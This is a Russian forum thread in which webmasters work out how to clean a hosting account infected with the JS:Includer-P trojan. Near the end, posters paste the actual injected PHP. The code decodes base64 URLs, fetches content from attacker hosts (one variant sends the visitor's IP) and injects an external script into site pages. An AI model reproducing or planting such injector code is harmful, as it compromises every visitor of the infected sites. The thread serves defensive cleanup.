JS:Includer-P [Trj] на площадке. Мистика с удалением.

[Nikerok]

Товарищи понадавались паролей, которые не менялись хрен знает сколько. В итоге антивирь ругается на все сайты площадки на бяку JS:Includer-P [Trj].
Я таки с очищением площадки не сталкивался, а просят меня. Площадка на masterhost.ru на Unix. Поэтому содержимое тупо выгружалось, проверялось на бяку. В индексных файлах везде был добавлен аброкадабренный скрипт явовский, после удаления которого антивирь перестает ругаться. Потом были проверены журналы, исправлены файлы, которые антивирус порезал при скачивании. Правилось все через фтп клиент прям на площадке. В 4х файлах php я не могу вычленить этот скрипт, он в середине файлов и я со своими знаниями не могу его точно определить. Эти 4 файла были тупо удалены с площадки.
В итоге должно быть все чисто, а оно все равно ругается.
Что забыл, о чем мне забыли посоветовать в ТП мастерхоста?

На первом пытаюсь понять, что не так. Avast ругается.
http://zaysvet.ru/
На этом и других сайтах площадки - вывесил пока профилактику.
http://partnergroup.org/

Из ТП площадки отписались, мол у них все открывается, ни на что не ругается. Однако я не уверен, что они это сделали, когда еще не была заменена заглавная страница, и что они добрались до zaysvet.

Мистика заключается в том, что скачанная площадка на компе и проверенная Avast ничего не выдает. При ее скачивании Avast не режет никакие файлы, этот момент я пофиксил. Однако на сайты ругается.

Использую Chrome. Сайты проверялись еще на двух компах с Avast и одном с Касперским. История та же. Без понятия куда копать.

Еще момент - странные скрипты, оказывается, присутствовали в довольно старых бэкапах, примерно годичной давности. Авастом пользуюсь больше года. Проблемы начались в начале февраля.

[REDACTED]

Товарищи понадавались паролей, которые не менялись хрен знает сколько. В итоге антивирь ругается на все сайты площадки на бяку JS:Includer-P [Trj].
Я таки с очищением площадки не сталкивался, а просят меня. Площадка на masterhost.ru на Unix. Поэтому содержимое тупо выгружалось, проверялось на бяку. В индексных файлах везде был добавлен аброкадабренный скрипт явовский, после удаления которого антивирь перестает ругаться. Потом были проверены журналы, исправлены файлы, которые антивирус порезал при скачивании. Правилось все через фтп клиент прям на площадке. В 4х файлах php я не могу вычленить этот скрипт, он в середине файлов и я со своими знаниями не могу его точно определить. Эти 4 файла были тупо удалены с площадки.
В итоге должно быть все чисто, а оно все равно ругается.
Что забыл, о чем мне забыли посоветовать в ТП мастерхоста?

На первом пытаюсь понять, что не так. Avast ругается.
hххp://zaysvet.ru/
На этом и других сайтах площадки - вывесил пока профилактику.
http://partnergroup.org/

Из ТП площадки отписались, мол у них все открывается, ни на что не ругается. Однако я не уверен, что они это сделали, когда еще не была заменена заглавная страница, и что они добрались до zaysvet.

Мистика заключается в том, что скачанная площадка на компе и проверенная Avast ничего не выдает. При ее скачивании Avast не режет никакие файлы, этот момент я пофиксил. Однако на сайты ругается.

Использую Chrome. Сайты проверялись еще на двух компах с Avast и одном с Касперским. История та же. Без понятия куда копать.

Еще момент - странные скрипты, оказывается, присутствовали в довольно старых бэкапах, примерно годичной давности. Авастом пользуюсь больше года. Проблемы начались в начале февраля.

///////////////////////////////////////////////////////////////////////////
На первом пытаюсь понять, что не так. Avast ругается.
hххp://zaysvet.ru/
//////////////////////////////////////////////////////////////////////////

http://antivirus-alarm.ru/proverka/?url=http%3A%2F%2Fzaysvet.ru%2F
http://sitecheck.sucuri.net/results/zaysvet.ru
http://wepawet.iseclab.org/view.php?hash=8923dea250c1e0c8af59ed4d1fd3fbc1&t=1360994720&type=js
http://jsunpack.jeek.org/?report=b77cdb7fcb8c211550315b69531ad940a950a003
http://urlquery.net/report.php?id=1014442

Network Activity
(hххp://touchme.changeip.name/rsize.js ) - на это ругается Аваст (рис.в скрипке)
http://www.urlvoid.com/scan/touchme.changeip.name/

[Nikerok]

Я совсем не гуру. Подскажите пожалуйста, где искать эту строчку?

[REDACTED]

Я совсем не гуру. Подскажите пожалуйста, где искать эту строчку?

http://sitecheck.sucuri.net/results/zaysvet.ru


Вот тут показаны пути....

и я прикрепил фото...если открыть по F4 главную страничку....самая последняя строчка.

 

[Nikerok]

Так,  этим я понял.
Ищу их через ftp на площадке, проверил индексные файлы, файлы tpl, некоторые css - везде в конце есть 

Code: [Select]

<!--FF_END_IGNORE--> а строчку со скриптом нигде не вижу.
Работаю с тотал коммандер, жму правку или просмотр. Пусто.
Что я делаю не так?

[REDACTED]

Нет 100% защиты от взлома, но есть простые меры предосторожности, которые должны предпринимать веб-мастера:

1. Не храните пароли от ФТП в ФТП менеджерах. Даже если программа обещает, что все безопасно – не верьте.

2. Пользуйтесь обновленными антивирусами.

3. Всегда обновляйте движок сайта и модули до актуальной версии. В CMS часто находят различные уязвимости и баги. Постоянно проверяйте новости движков, чтобы вовремя обезопасить свой сайт от взлома.

4. Никому не давайте пароли от ФТП, хостинг-аккаунтов, админ-панелей и т.д. Даже друзьям

5. Иногда полезно менять пароли от всего, что помогает получить доступ к сайту.

6. Если вы ведете блог или активно участвуете в жизни какого-либо форума, не стоит показывать свои сайты. Потому что на 10 друзей может найтись один враг. А на 100 врагов – один злоумышленник, который может взломать ваш сайт не только ради корыстных целей, а и просто так – поржать.

7. Если есть почтовый ящик, через который можно получить доступ к сайту, то максимально обезопасте его от взлома. Поставьте сложный пароль, сложный ответ на вопрос, и сложный метод восстановления доступа и вспоминание пароля и т.д.

Даже если сайт взломали, у вас все должно быть для отката – бэкап файлов и базы данных. Если вы не делаете бэкапы – последствия взлома могут быть катастрофичными.

Помните: взломать можно любой сайт.

При скачивании у меня это строчка есть....

Извините я не вэб-мастер, где то происходит подсаживание скрипта...ели нет не зараженного бэкапа, я не знаю где копать...подождите возможно на форуме есть более компетентные специалисты, возможно что то подскажут.   

[Nikerok]

А каким способом скачиваете? Может это мне поможет. Я когда только увидел заражение, открыл много других скриптов  в фалах php css tpl. Но эту строчку я уже не знаю где копать. Ее просто нет.
ТП мастерхоста как-то яро навязывают услугу по удалению вируса. Суть разговора примерно такая : - Площадка заражена. - У нас все сайты открываются нормально. - Даже этот? -Да и этот. - А какой антивирь установлен? - Никакой. У нас кстати есть платная услуга по удалению вирусов.

[REDACTED]

А каким способом скачиваете? Может это мне поможет.

Программой Download Master 5.14.2.1329 указываю Ваш сайт, скачиваю..сохраняю под любым именем.

[Nikerok]

Есть в мастерхосте хорошие люди.

Может модераторам стоит запихнуть в фак данный код. Абракадабры сложновато разглядеть:

В индексном файле содержится кусок кода:
function collectnewss() {
        $get =
sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
                $content = @file_get_contents($get);
                if (!$content)
                        echo
sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly90b3VjaG1lLmNoYW5nZWlwLm5hbWUvcnNpemUuanMiPjwvc2NyaXB0Pg==");

                else
                        echo $content;

где подставляется адрес touchme.changeip.name/rsize.js но в закодированной форме.

--
С уважением,
Владимир Тетерин,
Инженер технической поддержки
.masterhost
http://masterhost.ru/support/howtocontact/

[Alex2k]

В моем случаи был такой код. Спасибо форуму за помощь!

function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

      if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
      $ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
      $file = @fopen ($get, "r");
      $content = @fread($file, 1000);
      @setcookie("iJijkdaMnerys", $value, time()+3600*24);
      if (!$content)
         echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY2NvdW50dXMuZ2V0cy1pdC5uZXQvZ29vZ2xlc3RhdC5waHAiPjwvc2NyaXB0Pg==");
      else
         echo $content;

      }
}
collectnewss ();

[sergofun]

Может модераторам стоит запихнуть в фак данный код. Абракадабры сложновато разглядеть

Код может быть разным. А вот наличие абракадабры (зашифрованного кода) как раз и должно наводить на мысль о том, что кто-то за этим кодом прячет нехорошие вещи.

P.S.: декодер: http://www.artlebedev.ru/tools/decoder/
Нечитаемый хэш вида "aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=" с легкостью превращает в ссылку хттп://xxxporno.xxuz.com:888/move.php?ip=